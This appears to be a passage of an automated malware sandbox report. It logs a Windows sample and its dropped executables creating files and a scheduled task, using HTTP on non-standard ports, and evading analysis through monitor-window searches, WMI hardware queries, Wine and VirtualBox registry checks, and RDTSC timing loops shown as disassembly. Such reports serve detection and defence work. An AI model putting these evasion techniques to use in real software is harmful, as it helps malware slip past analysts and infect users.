Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loqVSeJ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50000

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 19F55D second address: 19F56F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8EA52B3CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F8EA52B3CA6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 303545 second address: 303549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 303549 second address: 30357D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB6h 0x00000007 jnc 00007F8EA52B3CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8EA52B3CB4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 30357D second address: 3035A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F8EA4E2EA46h 0x00000009 je 00007F8EA4E2EA46h 0x0000000f js 00007F8EA4E2EA46h 0x00000015 jmp 00007F8EA4E2EA4Ah 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007F8EA4E2EA46h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3035A5 second address: 3035AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8EA52B3CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3178F5 second address: 317906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8EA4E2EA46h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 317906 second address: 31790A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
